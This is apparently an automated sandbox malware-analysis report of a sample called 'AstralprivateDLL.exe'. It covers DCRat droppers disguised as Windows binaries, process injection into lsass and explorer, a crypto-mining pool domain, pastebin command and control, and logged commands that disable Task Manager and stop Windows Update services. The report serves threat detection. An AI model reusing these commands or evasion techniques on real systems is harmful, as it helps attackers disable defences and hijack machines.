                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\powershellp VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\powershellp VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\lsassl VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\lsassl VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\lsass VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\lsass VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\lsassl VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\lsassl VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\sihosts VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\sihosts VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\sihost VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\sihost VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\sihosts VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSE VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSE VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSE VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSE VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\WmiPrvSEW VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\ServerComponenthostMonitorDllS VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\ServerComponenthostMonitorDllS VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\ServerComponenthostMonitorDll VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\ServerComponenthostMonitorDll VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\ServerComponenthostMonitorDllS VolumeInformation
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B01C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,20_2_00007FF603B01C64
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_0017DF1E
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016B146 GetVersionExW,1_2_0016B146
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                                  Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                  Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 0000000D.00000002.2245855345.00000000126BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.0.ServerComponenthostMonitorDll.exe.220000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000000.1791002299.0000000000222000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000001.00000003.1728765563.0000000006653000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000001.00000003.1729671319.000000000665D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\en-GB\WmiPrvSE.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\ServerComponenthostMonitorDll.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\Platform\sihost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\appcompat\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\lsass.exe, type: DROPPED
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.0.ServerComponenthostMonitorDll.exe.220000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Windows\en-GB\WmiPrvSE.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\ServerComponenthostMonitorDll.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\Platform\sihost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\appcompat\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\lsass.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 0000000D.00000002.2245855345.00000000126BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.0.ServerComponenthostMonitorDll.exe.220000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000000.1791002299.0000000000222000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000001.00000003.1728765563.0000000006653000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000001.00000003.1729671319.000000000665D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\en-GB\WmiPrvSE.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\ServerComponenthostMonitorDll.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\Platform\sihost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\appcompat\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\lsass.exe, type: DROPPED
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.0.ServerComponenthostMonitorDll.exe.220000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.AstralprivateDLL.exe.bin.exe.308171f.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66a1718.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 1.3.Astral private DLL.exe.66ab718.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Windows\en-GB\WmiPrvSE.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\ServerComponenthostMonitorDll.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\Platform\sihost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\appcompat\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\containerperf\lsass.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting
                                  Valid Accounts131
                                  Windows Management Instrumentation
                                  11
                                  Scripting
                                  1
                                  Abuse Elevation Control Mechanism
                                  41
                                  Disable or Modify Tools
                                  1
                                  Credential API Hooking
                                  1
                                  System Time Discovery
                                  1
                                  Taint Shared Content
                                  1
                                  Archive Collected Data
                                  1
                                  Web Service
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts2
                                  Native API
                                  11
                                  DLL Side-Loading
                                  11
                                  DLL Side-Loading
                                  1
                                  Deobfuscate/Decode Files or Information
                                  LSASS Memory2
                                  File and Directory Discovery
                                  Remote Desktop Protocol1
                                  Credential API Hooking
                                  1
                                  Encrypted Channel
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts12
                                  Command and Scripting Interpreter
                                  1
                                  Windows Service
                                  1
                                  Access Token Manipulation
                                  1
                                  Abuse Elevation Control Mechanism
                                  Security Account Manager57
                                  System Information Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts21
                                  Scheduled Task/Job
                                  21
                                  Scheduled Task/Job
                                  1
                                  Windows Service
                                  3
                                  Obfuscated Files or Information
                                  NTDS241
                                  Security Software Discovery
                                  Distributed Component Object ModelInput Capture1
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts1
                                  Service Execution
                                  41
                                  Registry Run Keys / Startup Folder
                                  812
                                  Process Injection
                                  1
                                  Install Root Certificate
                                  LSA Secrets1
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable Media1
                                  PowerShell
                                  RC Scripts21
                                  Scheduled Task/Job
                                  13
                                  Software Packing
                                  Cached Domain Credentials41
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items41
                                  Registry Run Keys / Startup Folder
                                  11
                                  DLL Side-Loading
                                  DCSync1
                                  Application Window Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  File Deletion
                                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
                                  Rootkit
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron133
                                  Masquerading
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd2
                                  Modify Registry
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task41
                                  Virtualization/Sandbox Evasion
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Access Token Manipulation
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job812
                                  Process Injection
                                  Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                                  Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                                  Hidden Files and Directories
                                  Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590023 Sample: AstralprivateDLL.exe.bin.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 102 pastebin.com 2->102 104 pool.hashvault.pro 2->104 112 Suricata IDS alerts for network traffic 2->112 114 Antivirus detection for dropped file 2->114 116 Antivirus / Scanner detection for submitted sample 2->116 120 24 other signatures 2->120 12 AstralprivateDLL.exe.bin.exe 10 2->12         started        16 cmd.exe 1 2->16         started        18 cmd.exe 2->18         started        20 2 other processes 2->20 signatures3 118 Connects to a pastebin service (likely for C&C) 102->118 process4 file5 98 C:\Users\user\AppData\Local\...\twain_32.exe, PE32+ 12->98 dropped 100 C:\Users\user\...\Astral private DLL.exe, PE32 12->100 dropped 154 Detected unpacking (changes PE section rights) 12->154 22 Astral private DLL.exe 3 6 12->22         started        25 twain_32.exe 2 12->25         started        156 Uses powercfg.exe to modify the power settings 16->156 158 Stops critical windows services 16->158 160 Modifies power options to not sleep / hibernate 16->160 28 conhost.exe 16->28         started        30 sc.exe 1 16->30         started        32 sc.exe 16->32         started        38 3 other processes 16->38 40 5 other processes 18->40 162 Loading BitLocker PowerShell Module 20->162 34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        signatures6 process7 file8 80 C:\...\ServerComponenthostMonitorDll.exe, PE32 22->80 dropped 82 mtmIdTw4RygS3trJMn...snR5lufKuCs3iyL.vbe, data 22->82 dropped 42 wscript.exe 1 22->42         started        84 C:\Users\user\AppData\...\bcapgbqjwdsj.tmp, PE32+ 25->84 dropped 86 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 25->86 dropped 124 Multi AV Scanner detection for dropped file 25->124 126 Suspicious powershell command line found 25->126 128 Machine Learning detection for dropped file 25->128 130 6 other signatures 25->130 45 dialer.exe 25->45         started        signatures9 process10 signatures11 132 Windows Scripting host queries suspicious COM object (likely to drop second stage) 42->132 47 cmd.exe 1 42->47         started        134 Injects code into the Windows Explorer (explorer.exe) 45->134 136 Contains functionality to inject code into remote processes 45->136 138 Writes to foreign memory regions 45->138 140 4 other signatures 45->140 49 lsass.exe 45->49 injected 52 winlogon.exe 45->52 injected 54 svchost.exe 45->54 injected 56 10 other processes 45->56 process12 signatures13 58 ServerComponenthostMonitorDll.exe 12 30 47->58         started        62 reg.exe 1 1 47->62         started        64 conhost.exe 47->64         started        106 Installs new ROOT certificates 49->106 108 Uses schtasks.exe or at.exe to add and modify task schedules 49->108 110 Writes to foreign memory regions 49->110 66 MpCmdRun.exe 49->66         started        68 schtasks.exe 49->68         started        process14 file15 90 C:\containerperf\lsass.exe, PE32 58->90 dropped 92 C:\containerperf\WmiPrvSE.exe, PE32 58->92 dropped 94 C:\Windows\en-GB\WmiPrvSE.exe, PE32 58->94 dropped 96 11 other malicious files 58->96 dropped 142 Antivirus detection for dropped file 58->142 144 Multi AV Scanner detection for dropped file 58->144 146 Creates an undocumented autostart registry key 58->146 152 7 other signatures 58->152 70 csc.exe 58->70         started        148 Disable Task Manager(disabletaskmgr) 62->148 150 Disables the Windows task manager (taskmgr) 62->150 74 conhost.exe 66->74         started        signatures16 process17 file18 88 C:\Windows\...\SecurityHealthSystray.exe, PE32 70->88 dropped 122 Infects executable files (exe, dll, sys, html) 70->122 76 conhost.exe 70->76         started        78 cvtres.exe 70->78         started        signatures19 process20

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  AstralprivateDLL.exe.bin.exe61%ReversingLabsWin32.Trojan.Generic
                                  AstralprivateDLL.exe.bin.exe73%VirustotalBrowse
                                  AstralprivateDLL.exe.bin.exe100%AviraHIDDENEXT/Crypted
                                  AstralprivateDLL.exe.bin.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Windows\appcompat\powershell.exe100%AviraHEUR/AGEN.1339906
                                  C:\Users\user\Desktop\AvUrEmYP.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Users\user\AppData\Local\Temp\Astral private DLL.exe100%AviraVBS/Runner.VPG
                                  C:\containerperf\lsass.exe100%AviraHEUR/AGEN.1339906
                                  C:\containerperf\ServerComponenthostMonitorDll.exe100%AviraHEUR/AGEN.1339906
                                  C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmp100%AviraHEUR/AGEN.1362795
                                  C:\Program Files\Windows Defender\Platform\sihost.exe100%AviraHEUR/AGEN.1339906
                                  C:\Windows\en-GB\WmiPrvSE.exe100%AviraHEUR/AGEN.1339906
                                  C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe100%AviraVBS/Runner.VPG
                                  C:\Users\user\AppData\Local\Temp\bxCB1k3pGG.bat100%AviraBAT/Delbat.C
                                  C:\Windows\en-GB\WmiPrvSE.exe100%AviraHEUR/AGEN.1339906
                                  C:\Users\user\Desktop\qHqBUadh.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\QWRgRujm.log100%Joe Sandbox ML
                                  C:\Windows\appcompat\powershell.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\gYWllyYA.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\AvUrEmYP.log100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\Astral private DLL.exe100%Joe Sandbox ML
                                  C:\containerperf\lsass.exe100%Joe Sandbox ML
                                  C:\containerperf\ServerComponenthostMonitorDll.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmp100%Joe Sandbox ML
                                  C:\Program Files\Windows Defender\Platform\sihost.exe100%Joe Sandbox ML
                                  C:\Windows\en-GB\WmiPrvSE.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\nWKkNNTp.log100%Joe Sandbox ML
                                  C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                                  C:\Windows\en-GB\WmiPrvSE.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\twain_32.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe79%ReversingLabsWin64.Trojan.Whisperer
                                  C:\Program Files\Google\Chrome\updater.exe68%VirustotalBrowse
                                  C:\Program Files\Windows Defender\Platform\sihost.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Program Files\Windows Defender\Platform\sihost.exe49%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\Astral private DLL.exe62%ReversingLabsWin32.Trojan.Uztuby
                                  C:\Users\user\AppData\Local\Temp\Astral private DLL.exe43%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmp92%ReversingLabsWin64.Trojan.Heracles
                                  C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmp82%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Temp\twain_32.exe79%ReversingLabsWin64.Trojan.Whisperer
                                  C:\Users\user\Desktop\AvUrEmYP.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\IbBZTfZC.log25%ReversingLabs
                                  C:\Users\user\Desktop\OMvfRcDl.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\QWRgRujm.log9%ReversingLabs
                                  C:\Users\user\Desktop\gYWllyYA.log29%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\Desktop\nWKkNNTp.log8%ReversingLabs
                                  C:\Users\user\Desktop\qHqBUadh.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Windows\appcompat\powershell.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Windows\en-GB\WmiPrvSE.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\containerperf\ServerComponenthostMonitorDll.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\containerperf\WmiPrvSE.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\containerperf\lsass.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  No Antivirus matches
                                  No Antivirus matches
                                  No Antivirus matches
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  bg.microsoft.map.fastly.net
                                  199.232.210.172
                                  truefalse
                                    high
                                    pool.hashvault.pro
                                    192.248.189.11
                                    truefalse
                                      high
                                      pastebin.com
                                      104.20.4.235
                                      truefalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://crl.mAstralprivateDLL.exe.bin.exe, 00000000.00000003.1726981626.0000000003569000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          No contacted IP infos
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1590023
                                          Start date and time:2025-01-13 13:39:15 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 12m 40s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:47
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:9
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:AstralprivateDLL.exe.bin.exe
